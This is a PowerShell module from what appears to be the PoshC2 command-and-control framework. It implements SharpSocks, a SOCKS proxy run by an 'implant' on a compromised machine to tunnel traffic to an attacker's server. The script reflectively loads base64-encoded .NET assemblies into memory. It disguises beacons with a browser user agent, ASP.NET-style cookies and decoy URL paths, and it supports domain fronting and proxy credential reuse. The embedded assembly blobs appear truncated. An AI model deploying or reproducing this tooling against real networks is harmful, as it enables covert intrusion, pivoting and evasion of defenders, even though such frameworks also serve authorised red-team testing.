PoshC2_Python/Modules/SharpSocks.ps1

236 lines
122 KiB
PowerShell
Raw Normal View History

2018-07-23 08:55:15 +00:00
$Global:SocksClientLoaded = $False
$Global:SocksServerLoaded = $False
$Global:Socks = $null
$Global:BoolStart = $null
$iLogOutput = $null
$Comms = $null
function SharpSocks {
<#
.Synopsis
Socks Proxy written in C# for .NET v4
Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell
SharpSocks 2017 Nettitude
Rob Maslen @rbmaslen
.DESCRIPTION
PS C:\> Usage: SharpSocks -Uri <Host>
.EXAMPLE
Start the server listening on port 127.0.0.1:8081 for connections from the implant and port 1080 for SOCKS connections
PS C:\> SharpSocks -Server -IPAddress 127.0.0.1 -Uri https://127.0.0.1:8081 -SocksPort 1080
.EXAMPLE
Start the server listening on port 127.0.0.1:8081 for connections from the implant and port 1080 for SOCKS connections. Use the provided certificates for the web server that listens for connections from the implant
PS C:\> SharpSocks -Server -TLSServerCertificate $<X509Certificate2> -IPAddress 127.0.0.1 -Uri https://127.0.0.1:8081 -SocksPort 1080
.EXAMPLE
Start the server specfiying the Encryption key and Command Channel Id to be used (these SAME values MUST also be passed to the client)
PS C:\> SharpSocks -Server -IPAddress 127.0.0.1 -Uri https://127.0.0.1:8081 -SocksPort 1080 -Insecure -Key PTDWISSNRCThqmpWEzXFZ1nSusz10u0qZ0n0UjH66rs= -Channel 7f404221-9f30-470b-b05d-e1a922be3ff6
.EXAMPLE
Start the Implant(Client) specifying the web server (http://127.0.0.1:8081), the encryption keys and channel id. Also specify a list of URLs to use when making HTTP Request. Set the beacon time to 5 seconds
PS C:\> SharpSocks -Client -Uri http://127.0.0.1:8081 -Key PTDWISSNRCThqmpWEzXFZ1nSusz10u0qZ0n0UjH66rs= -Channel 7f404221-9f30-470b-b05d-e1a922be3ff6 -URLs "site/review/access.php","upload/data/images" -Beacon 5000
.EXAMPLE
Same as above using different list of URLs
PS C:\> SharpSocks -Client -Uri http://127.0.0.1:8081 -Key PTDWISSNRCThqmpWEzXFZ1nSusz10u0qZ0n0UjH66rs= -Channel 7f404221-9f30-470b-b05d-e1a922be3ff6 -URLs "Upload","Push","Res" -Beacon 5000
.EXAMPLE
Sames as above but connect out via an authenticated proxy server
PS C:\> SharpSocks -Client -Uri http://127.0.0.1:8081 -ProxyUser bob -ProxyPass pass -ProxyDomain dom -ProxyUrl http://10.150.10.1:8080 -Key PTDWISSNRCThqmpWEzXFZ1nSusz10u0qZ0n0UjH66rs= -Channel 7f404221-9f30-470b-b05d-e1a922be3ff6 -URLs "Upload","Push","Res" -Beacon 500
#>
param(
[Parameter(Mandatory=$True)][string]$Uri,
[Parameter(Mandatory=$False)]$URLs="Upload",
[Parameter(Mandatory=$False)][switch]$Server,
[Parameter(Mandatory=$False)][switch]$Client,
[Parameter(Mandatory=$False)][int]$SocksPort=43334,
[Parameter(Mandatory=$False)][string]$Channel,
[Parameter(Mandatory=$False)][string]$IPAddress="0.0.0.0",
[Parameter(Mandatory=$False)][string]$DomainFrontURL,
[Parameter(Mandatory=$False)][int]$Beacon="2000",
[Parameter(Mandatory=$False)][string]$Key,
[Parameter(Mandatory=$False)][switch]$Insecure,
[Parameter(Mandatory=$False)][string]$UserAgent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36",
[Parameter(Mandatory=$False)][string]$Cookie1="ASP.NET_SessionId",
[Parameter(Mandatory=$False)][string]$Cookie2="__RequestVerificationToken",
[Parameter(Mandatory=$False, HelpMessage="Certificate to be used by the web server, must be of type System.Security.Cryptography.X509Certificates.X509Certificate2")][System.Security.Cryptography.X509Certificates.X509Certificate2]$TLSServerCertificate,
[Parameter(Mandatory=$False)][string]$ProxyURL,
[Parameter(Mandatory=$False)][string]$ProxyDomain,
[Parameter(Mandatory=$False)][string]$ProxyUser,
[Parameter(Mandatory=$False)][string]$ProxyPassword
)
echo "[-] Loading Assemblies"
if ($psversiontable.CLRVersion.Major -lt 3) {
echo "Not running on CLRVersion 4 or above. Try 'migrate' to use unmanaged powershell"
} else {
if (($SocksClientLoaded -ne "TRUE") -and ($Client.IsPresent)) {
$Script:SocksClientLoaded = "TRUE"
echo "[-] Loading Client Assembly"
$PS = "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
$DllBytes = [System.Convert]::FromBase64String($PS)
$Assembly = [System.Reflection.Assembly]::Load($DllBytes)
echo "[+] Client Assembly Loaded"
}
if (($SocksServerLoaded -ne "TRUE") -and ($Server.IsPresent)) {
$Script:SocksServerLoaded = "TRUE"
echo "[-] Loading Server Assembly"
$PS = "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
$DllBytes = [System.Convert]::FromBase64String($PS)
$Assembly = [System.Reflection.Assembly]::Load($DllBytes)
echo "[+] Server Server Loaded"
}
if($Insecure.IsPresent) {
$InsecureSSL=$true
} else {
$InsecureSSL=$false
}
if (!$Key) {
$Key = Create-AesKey
}
$secureStringPwd = $Key | ConvertTo-SecureString -AsPlainText -Force
#If there is no channel set
if (!$Channel) {
$Channel = Get-RandomChamnnel -Length 25
}
# Proxy Config
if ($ProxyURL) {
$Proxy = New-Object System.Net.WebProxy($ProxyURL,$True);
if ($ProxyUser -and $ProxyPassword) {
$creds = new-object System.Net.NetworkCredential
$creds.UserName = $ProxyUser
$creds.Domain = $ProxyDomain
$creds.SecurePassword = ConvertTo-SecureString $ProxyPassword -AsPlainText -Force;
$Proxy.Credentials = $Creds;
} else {
$Proxy.UseDefaultCredentials = $True;
}
} else {
$Proxy = [System.Net.WebRequest]::GetSystemWebProxy()
$Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials
}
# New Uri
$Uri = [System.Uri]$Uri
# Add URLs
$NewURLs = New-Object "System.Collections.Generic.List[String]"
foreach ($URL in $URLs) {
$NewURLs.Add($URL)
}
if ($Server.IsPresent){
$Script:iLogOutput = New-Object SharpSocksServer.ServerComms.DebugConsoleOutput
$Script:BoolStart = [SharpSocksServer.Source.Integration.PSSocksServer]::CreateSocksController($IPAddress, $uri, $TLSServerCertificate, $Channel, $SocksPort, $key, $Cookie1, $Cookie2, $iLogOutput);
if ($BoolStart) {
echo ""
echo "[+] SharpSocks server started!"
echo ""
echo "-Channel $Channel"
echo "-Key $Key"
echo "Cookies: $Cookie1 $Cookie2"
echo ""
echo ""
echo "[-] Run StopSocks to stop the server!"
echo ""
}
}
if ($Client.IsPresent){
$Script:Comms = New-Object SocksProxy.Classes.Integration.PoshDefaultImplantComms
$Script:Socks = [SocksProxy.Classes.Integration.PoshCreateProxy]::CreateSocksController($Uri, $Channel, $DomainFrontURL, $UserAgent, $secureStringPwd, $NewURLs, $Cookie1, $Cookie2, $Proxy, $Beacon, $Comms, $InsecureSSL);
$Script:BoolStart = $Socks.Start()
if ($BoolStart) {
echo ""
echo "[+] SharpSocks client Started!"
echo ""
echo "URLs:"
foreach ($URL in $URLs) {
echo "$($Uri)$($URL)"
}
echo "Channel: $Channel"
echo "Key being used: $Key"
echo "Beacon: $Beacon"
echo "Cookies: $Cookie1 $Cookie2"
echo "User-Agent: $UserAgent"
echo ""
echo ""
echo "[-] Run StopSocks to stop the client!"
echo ""
}
}
}
}
function StopSocks {
if ($BoolStart) {
$Script:BoolStart = $Socks.Stop()
$Script:BoolStart = $Socks.HARDStop()
echo ""
echo "[-] SharpSocks stopped!"
echo ""
} else {
echo ""
echo "[-] SharpSocks not running!"
echo ""
}
}
# creates a randon AES symetric encryption key
function Create-AesManagedObject
{
param
(
[Object]
$key,
[Object]
$IV
)
$aesManaged = New-Object -TypeName 'System.Security.Cryptography.RijndaelManaged'
$aesManaged.Mode = [System.Security.Cryptography.CipherMode]::CBC
$aesManaged.Padding = [System.Security.Cryptography.PaddingMode]::Zeros
$aesManaged.BlockSize = 128
$aesManaged.KeySize = 256
if ($IV)
{
if ($IV.getType().Name -eq 'String')
{$aesManaged.IV = [System.Convert]::FromBase64String($IV)}
else
{$aesManaged.IV = $IV}
}
if ($key)
{
if ($key.getType().Name -eq 'String')
{$aesManaged.Key = [System.Convert]::FromBase64String($key)}
else
{$aesManaged.Key = $key}
}
$aesManaged
}
# creates a randon AES symetric encryption key
function Create-AesKey()
{
$aesManaged = Create-AesManagedObject
$aesManaged.GenerateKey()
[System.Convert]::ToBase64String($aesManaged.Key)
}
function Get-RandomChamnnel
{
param ([int]$Length)
$set = 'abcdefghijklmnopqrstuvwxyz0123456789'.ToCharArray()
$result = ''
for ($x = 0; $x -lt $Length; $x++)
{
$result += $set | Get-Random
}
return $result
}